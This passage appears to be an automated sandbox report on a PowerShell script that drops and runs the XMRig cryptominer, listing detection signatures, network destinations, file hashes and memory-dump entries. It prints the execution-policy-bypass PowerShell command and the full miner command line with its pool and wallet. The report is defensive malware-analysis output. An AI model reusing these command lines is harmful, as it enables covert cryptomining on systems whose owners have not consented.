| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1436-46-0x00000173D8760000-0x00000173D8780000-memory.dmp
memory/1436-47-0x00000173D87B0000-0x00000173D87D0000-memory.dmp
memory/1436-48-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/2564-49-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp
memory/2564-50-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
memory/1436-52-0x00000173D87F0000-0x00000173D8810000-memory.dmp
memory/1436-53-0x00000173D87D0000-0x00000173D87F0000-memory.dmp
memory/2564-51-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
memory/1436-54-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-55-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-56-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-58-0x00000173D87D0000-0x00000173D87F0000-memory.dmp
memory/1436-57-0x00000173D87F0000-0x00000173D8810000-memory.dmp
memory/1436-59-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-60-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-61-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-62-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-63-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-64-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-65-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-66-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-67-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-68-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-69-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-70-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-71-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-72-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-73-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-74-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-75-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-76-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-77-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-78-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-79-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-80-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-81-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-82-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-83-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-84-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-85-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-86-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-87-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-88-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-89-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-90-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-91-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-92-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-93-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-94-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-95-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-96-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-97-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-98-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-99-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-100-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-101-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-102-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-103-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-104-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-105-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-106-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-107-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-108-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-109-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-110-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-111-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-112-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-113-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-114-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-115-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-116-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
memory/1436-117-0x00007FF765EF0000-0x00007FF766B23000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:33
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4880 wrote to memory of 3856 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4880 wrote to memory of 3856 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 184.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4880-4-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-5-0x0000022242EA0000-0x0000022242EC2000-memory.dmp
memory/4880-6-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-9-0x0000022243050000-0x00000222430C6000-memory.dmp
memory/4880-10-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieyrhmxw.ify.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4880-25-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-48-0x00000222431D0000-0x00000222431E2000-memory.dmp
memory/4880-61-0x0000022242FE0000-0x0000022242FEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3856-90-0x0000022777260000-0x0000022777280000-memory.dmp
memory/3856-91-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-92-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/4880-93-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-94-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-95-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/3856-96-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-97-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-98-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-99-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-100-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-101-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-102-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-103-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-104-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-105-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-106-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-107-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-108-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-109-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-110-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-111-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-112-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-113-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-114-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-115-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-116-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-117-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-118-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-119-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-120-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-121-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-122-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-123-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-124-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-125-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-126-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-127-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-128-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-129-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-130-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-131-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-132-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-133-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-134-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-135-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-136-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-137-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-138-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-139-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-140-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-141-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-142-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-143-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-144-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-145-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-146-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-147-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-148-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-149-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-150-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-151-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-152-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-153-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-154-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-155-0x00007FF725220000-0x00007FF725E53000-memory.dmp
memory/3856-156-0x00007FF725220000-0x00007FF725E53000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4632 wrote to memory of 1336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4632 wrote to memory of 1336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
Files
memory/4632-0-0x00007FFECB833000-0x00007FFECB835000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi1xopvf.y25.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4632-10-0x00000210CBB50000-0x00000210CBB72000-memory.dmp
memory/4632-11-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/4632-12-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/4632-14-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/4632-15-0x00000210CBF40000-0x00000210CBF52000-memory.dmp
memory/4632-16-0x00000210CBB40000-0x00000210CBB4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1336-47-0x000001792B160000-0x000001792B180000-memory.dmp
memory/1336-48-0x000001792B1B0000-0x000001792B1D0000-memory.dmp
memory/1336-49-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/4632-50-0x00007FFECB833000-0x00007FFECB835000-memory.dmp
memory/1336-51-0x000001792B1D0000-0x000001792B1F0000-memory.dmp
memory/1336-52-0x000001792B1F0000-0x000001792B210000-memory.dmp
memory/1336-53-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/4632-54-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/4632-56-0x00007FFECB830000-0x00007FFECC2F1000-memory.dmp
memory/1336-55-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-57-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-58-0x000001792B1D0000-0x000001792B1F0000-memory.dmp
memory/1336-59-0x000001792B1F0000-0x000001792B210000-memory.dmp
memory/1336-60-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-61-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-62-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-63-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-64-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-65-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-66-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-67-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-68-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-69-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-70-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-71-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-72-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-73-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-74-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-75-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-76-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-77-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-78-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-79-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-80-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-81-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-82-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-83-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-84-0x00007FF683910000-0x00007FF684543000-memory.dmp
memory/1336-85-0x00007FF683910000-0x00007FF684543000-memory.dmp
